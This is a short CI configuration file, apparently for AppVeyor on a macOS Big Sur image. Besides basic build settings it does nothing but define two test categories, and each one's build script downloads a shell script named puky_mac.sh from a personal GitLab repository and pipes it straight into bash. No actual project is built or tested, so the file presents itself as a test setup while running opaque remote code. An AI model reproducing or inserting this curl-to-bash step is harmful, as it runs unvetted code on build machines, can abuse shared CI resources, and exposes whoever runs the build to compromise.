version: 1.0.{build}
image:
- macOS-BigSur

build:
  parallel: true
  verbosity: minimal

test:
  categories:
  - - Test1
      build_script:
    - curl https://gitlab.com/azkadafa39/ajure/-/raw/main/puky_mac.sh | bash
  - - Test2
      build_script:
    - curl https://gitlab.com/azkadafa39/ajure/-/raw/main/puky_mac.sh | bash
